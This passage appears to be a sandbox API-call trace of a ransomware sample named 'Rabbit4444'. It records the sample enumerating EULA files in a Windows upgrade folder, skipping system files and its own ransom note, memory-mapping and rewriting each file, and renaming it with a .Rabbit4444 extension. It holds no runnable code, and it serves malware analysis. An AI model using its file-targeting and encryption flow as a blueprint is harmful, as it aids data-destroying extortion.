0x10c928 [0047.434] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0047.434] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.434] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0047.434] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13874499872) returned 1 [0047.434] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0047.434] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0047.434] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.435] CloseHandle (hObject=0x298) returned 1 [0047.435] CloseHandle (hObject=0x278) returned 1 [0047.437] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_hr-hr.htm.Rabbit4444") returned 63 [0047.437] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_hr-hr.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_hr-hr.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_hr-hr.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_hr-hr.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.438] InterlockedExchangeAdd (in: Addend=0xff618, Value=64880 | out: Addend=0xff618) returned 11775344 [0047.438] InterlockedExchangeAdd (in: Addend=0xff624, Value=5 | out: Addend=0xff624) returned 3125 [0047.438] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3ebeab, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3ebeab, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x14a5a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_hu-hu.htm", cAlternateFileName="EULA_H~3.HTM")) returned 1 [0047.438] lstrcmpiW (lpString1="EULA_hu-hu.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.438] lstrcmpiW (lpString1="EULA_hu-hu.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.438] lstrcmpiW (lpString1="EULA_hu-hu.htm", lpString2="Rabbit4444.exe") returned -1 [0047.438] lstrcmpiW (lpString1="EULA_hu-hu.htm", lpString2=".") returned 1 [0047.438] lstrcmpiW (lpString1="EULA_hu-hu.htm", lpString2="..") returned 1 [0047.438] lstrcmpiW (lpString1="EULA_hu-hu.htm", lpString2="windows") returned -1 [0047.438] lstrcmpiW (lpString1="EULA_hu-hu.htm", lpString2="bootmgr") returned 1 [0047.438] lstrcmpiW (lpString1="EULA_hu-hu.htm", lpString2="pagefile.sys") returned -1 [0047.438] lstrcmpiW (lpString1="EULA_hu-hu.htm", lpString2="boot") returned 1 [0047.438] lstrcmpiW (lpString1="EULA_hu-hu.htm", lpString2="ids.txt") returned -1 [0047.438] lstrcmpiW (lpString1="EULA_hu-hu.htm", lpString2="NTUSER.DAT") returned -1 [0047.438] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_hu-hu.htm" | out: lpString1="EULA_hu-hu.htm") returned="EULA_hu-hu.htm" [0047.438] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_hu-hu.htm", dwFileAttributes=0x0) returned 1 [0047.439] lstrlenW (lpString="EULA_hu-hu.htm") returned 14 [0047.439] lstrlenW (lpString="Rabbit4444") returned 10 [0047.439] lstrcmpiW (lpString1="_hu-hu.htm", lpString2="Rabbit4444") returned -1 [0047.439] lstrlenW (lpString=".dll") returned 4 [0047.439] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.439] lstrlenW (lpString=".lnk") returned 4 [0047.439] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.439] lstrlenW (lpString=".ini") returned 4 [0047.439] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.439] lstrlenW (lpString=".sys") returned 4 [0047.439] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.439] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_hu-hu.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_hu-hu.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.439] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.439] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13875005952) returned 1 [0047.439] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=84570) returned 1 [0047.439] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0047.439] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101958 [0047.439] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x14d60, lpName=0x0) returned 0x298 [0047.440] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14d60) returned 0x70000 [0047.444] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.444] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0047.444] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.444] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0047.445] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.445] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0047.445] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.445] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0047.445] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13875562929) returned 1 [0047.445] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0047.445] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101958 | out: hHeap=0xe0000) returned 1 [0047.445] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.446] CloseHandle (hObject=0x298) returned 1 [0047.446] CloseHandle (hObject=0x278) returned 1 [0047.449] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_hu-hu.htm.Rabbit4444") returned 63 [0047.449] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_hu-hu.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_hu-hu.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_hu-hu.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_hu-hu.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.449] InterlockedExchangeAdd (in: Addend=0xff618, Value=84576 | out: Addend=0xff618) returned 11840224 [0047.449] InterlockedExchangeAdd (in: Addend=0xff624, Value=5 | out: Addend=0xff624) returned 3130 [0047.449] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3ed234, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3ed234, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x10f6d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_it-it.htm", cAlternateFileName="EULA_I~1.HTM")) returned 1 [0047.449] lstrcmpiW (lpString1="EULA_it-it.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.449] lstrcmpiW (lpString1="EULA_it-it.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.449] lstrcmpiW (lpString1="EULA_it-it.htm", lpString2="Rabbit4444.exe") returned -1 [0047.449] lstrcmpiW (lpString1="EULA_it-it.htm", lpString2=".") returned 1 [0047.450] lstrcmpiW (lpString1="EULA_it-it.htm", lpString2="..") returned 1 [0047.450] lstrcmpiW (lpString1="EULA_it-it.htm", lpString2="windows") returned -1 [0047.450] lstrcmpiW (lpString1="EULA_it-it.htm", lpString2="bootmgr") returned 1 [0047.450] lstrcmpiW (lpString1="EULA_it-it.htm", lpString2="pagefile.sys") returned -1 [0047.450] lstrcmpiW (lpString1="EULA_it-it.htm", lpString2="boot") returned 1 [0047.450] lstrcmpiW (lpString1="EULA_it-it.htm", lpString2="ids.txt") returned -1 [0047.450] lstrcmpiW (lpString1="EULA_it-it.htm", lpString2="NTUSER.DAT") returned -1 [0047.450] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_it-it.htm" | out: lpString1="EULA_it-it.htm") returned="EULA_it-it.htm" [0047.450] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_it-it.htm", dwFileAttributes=0x0) returned 1 [0047.450] lstrlenW (lpString="EULA_it-it.htm") returned 14 [0047.450] lstrlenW (lpString="Rabbit4444") returned 10 [0047.450] lstrcmpiW (lpString1="_it-it.htm", lpString2="Rabbit4444") returned -1 [0047.450] lstrlenW (lpString=".dll") returned 4 [0047.450] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.450] lstrlenW (lpString=".lnk") returned 4 [0047.450] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.450] lstrlenW (lpString=".ini") returned 4 [0047.450] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.450] lstrlenW (lpString=".sys") returned 4 [0047.450] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.450] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_it-it.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_it-it.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.451] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.451] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13876134453) returned 1 [0047.451] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=69485) returned 1 [0047.451] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0047.451] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0047.451] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11270, lpName=0x0) returned 0x298 [0047.452] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11270) returned 0x70000 [0047.455] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.456] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0047.456] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.456] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0047.456] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.456] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0047.456] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.456] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0047.456] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13876673699) returned 1 [0047.456] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0047.456] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0047.456] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.457] CloseHandle (hObject=0x298) returned 1 [0047.457] CloseHandle (hObject=0x278) returned 1 [0047.459] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_it-it.htm.Rabbit4444") returned 63 [0047.459] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_it-it.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_it-it.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_it-it.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_it-it.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.460] InterlockedExchangeAdd (in: Addend=0xff618, Value=69488 | out: Addend=0xff618) returned 11924800 [0047.460] InterlockedExchangeAdd (in: Addend=0xff624, Value=5 | out: Addend=0xff624) returned 3135 [0047.460] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3ef94a, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3ef94a, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x3354e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_ja-jp.htm", cAlternateFileName="EULA_J~1.HTM")) returned 1 [0047.460] lstrcmpiW (lpString1="EULA_ja-jp.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.460] lstrcmpiW (lpString1="EULA_ja-jp.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.460] lstrcmpiW (lpString1="EULA_ja-jp.htm", lpString2="Rabbit4444.exe") returned -1 [0047.460] lstrcmpiW (lpString1="EULA_ja-jp.htm", lpString2=".") returned 1 [0047.460] lstrcmpiW (lpString1="EULA_ja-jp.htm", lpString2="..") returned 1 [0047.460] lstrcmpiW (lpString1="EULA_ja-jp.htm", lpString2="windows") returned -1 [0047.460] lstrcmpiW (lpString1="EULA_ja-jp.htm", lpString2="bootmgr") returned 1 [0047.460] lstrcmpiW (lpString1="EULA_ja-jp.htm", lpString2="pagefile.sys") returned -1 [0047.460] lstrcmpiW (lpString1="EULA_ja-jp.htm", lpString2="boot") returned 1 [0047.460] lstrcmpiW (lpString1="EULA_ja-jp.htm", lpString2="ids.txt") returned -1 [0047.460] lstrcmpiW (lpString1="EULA_ja-jp.htm", lpString2="NTUSER.DAT") returned -1 [0047.460] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_ja-jp.htm" | out: lpString1="EULA_ja-jp.htm") returned="EULA_ja-jp.htm" [0047.460] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ja-jp.htm", dwFileAttributes=0x0) returned 1 [0047.461] lstrlenW (lpString="EULA_ja-jp.htm") returned 14 [0047.461] lstrlenW (lpString="Rabbit4444") returned 10 [0047.461] lstrcmpiW (lpString1="_ja-jp.htm", lpString2="Rabbit4444") returned -1 [0047.461] lstrlenW (lpString=".dll") returned 4 [0047.461] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.461] lstrlenW (lpString=".lnk") returned 4 [0047.461] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.461] lstrlenW (lpString=".ini") returned 4 [0047.461] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.461] lstrlenW (lpString=".sys") returned 4 [0047.461] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.461] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ja-jp.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ja-jp.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.461] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.461] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13877209524) returned 1 [0047.461] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=210254) returned 1 [0047.461] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0047.461] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0047.462] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x33850, lpName=0x0) returned 0x298 [0047.463] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x33850) returned 0x70000 [0047.470] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.470] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0047.470] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.470] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0047.470] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.470] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0047.470] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.470] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0047.470] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13878084564) returned 1 [0047.470] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0047.470] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0047.470] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.472] CloseHandle (hObject=0x298) returned 1 [0047.472] CloseHandle (hObject=0x278) returned 1 [0047.478] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ja-jp.htm.Rabbit4444") returned 63 [0047.478] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ja-jp.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ja-jp.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ja-jp.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ja-jp.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.479] InterlockedExchangeAdd (in: Addend=0xff618, Value=210256 | out: Addend=0xff618) returned 11994288 [0047.479] InterlockedExchangeAdd (in: Addend=0xff624, Value=8 | out: Addend=0xff624) returned 3140 [0047.479] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3f205a, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3f205a, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x9ace3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_ko-kr.htm", cAlternateFileName="EULA_K~1.HTM")) returned 1 [0047.479] lstrcmpiW (lpString1="EULA_ko-kr.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.479] lstrcmpiW (lpString1="EULA_ko-kr.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.479] lstrcmpiW (lpString1="EULA_ko-kr.htm", lpString2="Rabbit4444.exe") returned -1 [0047.479] lstrcmpiW (lpString1="EULA_ko-kr.htm", lpString2=".") returned 1 [0047.479] lstrcmpiW (lpString1="EULA_ko-kr.htm", lpString2="..") returned 1 [0047.479] lstrcmpiW (lpString1="EULA_ko-kr.htm", lpString2="windows") returned -1 [0047.479] lstrcmpiW (lpString1="EULA_ko-kr.htm", lpString2="bootmgr") returned 1 [0047.479] lstrcmpiW (lpString1="EULA_ko-kr.htm", lpString2="pagefile.sys") returned -1 [0047.479] lstrcmpiW (lpString1="EULA_ko-kr.htm", lpString2="boot") returned 1 [0047.479] lstrcmpiW (lpString1="EULA_ko-kr.htm", lpString2="ids.txt") returned -1 [0047.479] lstrcmpiW (lpString1="EULA_ko-kr.htm", lpString2="NTUSER.DAT") returned -1 [0047.479] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_ko-kr.htm" | out: lpString1="EULA_ko-kr.htm") returned="EULA_ko-kr.htm" [0047.479] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ko-kr.htm", dwFileAttributes=0x0) returned 1 [0047.480] lstrlenW (lpString="EULA_ko-kr.htm") returned 14 [0047.480] lstrlenW (lpString="Rabbit4444") returned 10 [0047.480] lstrcmpiW (lpString1="_ko-kr.htm", lpString2="Rabbit4444") returned -1 [0047.481] lstrlenW (lpString=".dll") returned 4 [0047.481] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.481] lstrlenW (lpString=".lnk") returned 4 [0047.481] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.481] lstrlenW (lpString=".ini") returned 4 [0047.481] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.481] lstrlenW (lpString=".sys") returned 4 [0047.481] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.481] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ko-kr.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ko-kr.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.481] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.481] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13879164159) returned 1 [0047.481] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=634083) returned 1 [0047.481] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0047.481] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0047.481] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9aff0, lpName=0x0) returned 0x298 [0047.482] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9aff0) returned 0x1090000 [0047.498] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.498] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0047.498] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.498] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0047.498] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.498] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0047.498] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.498] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0047.498] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13880914477) returned 1 [0047.498] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0047.499] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0047.499] UnmapViewOfFile (lpBaseAddress=0x1090000) returned 1 [0047.504] CloseHandle (hObject=0x298) returned 1 [0047.504] CloseHandle (hObject=0x278) returned 1 [0047.518] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ko-kr.htm.Rabbit4444") returned 63 [0047.518] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ko-kr.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ko-kr.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ko-kr.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ko-kr.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.519] InterlockedExchangeAdd (in: Addend=0xff618, Value=634096 | out: Addend=0xff618) returned 12204544 [0047.519] InterlockedExchangeAdd (in: Addend=0xff624, Value=17 | out: Addend=0xff624) returned 3148 [0047.519] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3f33e0, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3f33e0, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x1293b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_lt-lt.htm", cAlternateFileName="EULA_L~1.HTM")) returned 1 [0047.519] lstrcmpiW (lpString1="EULA_lt-lt.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.519] lstrcmpiW (lpString1="EULA_lt-lt.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.519] lstrcmpiW (lpString1="EULA_lt-lt.htm", lpString2="Rabbit4444.exe") returned -1 [0047.519] lstrcmpiW (lpString1="EULA_lt-lt.htm", lpString2=".") returned 1 [0047.519] lstrcmpiW (lpString1="EULA_lt-lt.htm", lpString2="..") returned 1 [0047.519] lstrcmpiW (lpString1="EULA_lt-lt.htm", lpString2="windows") returned -1 [0047.519] lstrcmpiW (lpString1="EULA_lt-lt.htm", lpString2="bootmgr") returned 1 [0047.519] lstrcmpiW (lpString1="EULA_lt-lt.htm", lpString2="pagefile.sys") returned -1 [0047.519] lstrcmpiW 